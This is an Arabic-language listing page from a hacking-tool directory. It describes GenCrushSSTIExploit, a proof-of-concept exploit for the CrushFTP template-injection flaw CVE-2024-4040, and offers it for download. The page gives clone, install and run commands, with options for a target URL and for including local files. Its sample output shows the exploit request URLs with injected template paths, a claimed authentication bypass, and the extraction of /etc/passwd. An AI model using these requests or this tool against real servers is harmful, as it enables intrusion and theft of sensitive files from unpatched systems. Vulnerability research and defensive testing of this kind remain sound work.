Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GenCrushSSTIExploit — هو أداة PoC لـ CVE-2024-4040 لاستغلال ثغرة SSTI في CrushFTP | Kitploit
أدوات/GitHubGitHub/geniuszly/gencrushsstiexploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

هو أداة PoC لـ CVE-2024-4040 لاستغلال ثغرة SSTI في CrushFTP

عرض المستودع
81منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

العربية

GenCrushSSTIExploit هي أداة استغلال PoC تستهدف ثغرة SSTI (حقن القوالب من جانب الخادم) في CrushFTP CVE-2024-4040. توضح هذه الأداة كيفية استغلال هذه الثغرة لأغراض تعليمية واختبار الاختراق الأخلاقي فقط.

الميزات

  • إنشاء جلسة مع خادم CrushFTP لاستخراج ملفات تعريف الارتباط للمصادقة.
  • استغلال ثغرة SSTI لحقن الحمولات.
  • محاولة تجاوز المصادقة واستخراج الملفات الحساسة من الخادم.
  • استخدام rich لإخراج وحدة تحكم جميل ومنسق.

إخلاء المسؤولية

⚠️ استخدم هذه الأداة بمسؤولية! إنها مخصصة لأغراض البحث والتعليم فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

التثبيت

المتطلبات الأساسية

  • Python 3.7+
  • pip (مدير حزم Python)

استنساخ المستودع

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

تثبيت الحزم المطلوبة

root@kitploit:~
pip install -r requirements.txt

الاستخدام

الأمر الأساسي

root@kitploit:~
python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: يحدد عنوان URL المستهدف لخادم CrushFTP الضعيف.

المعلمات الاختيارية

  • -l / --lfi: تضمين الملف المحلي. يحدد الملف الذي سيتم تضمينه للاستخراج.
  • -w / --wordlist: يحدد قائمة كلمات للتجربة على مسارات الملفات.

مثال

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

مثال على الإخراج

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
تنزيل الأداة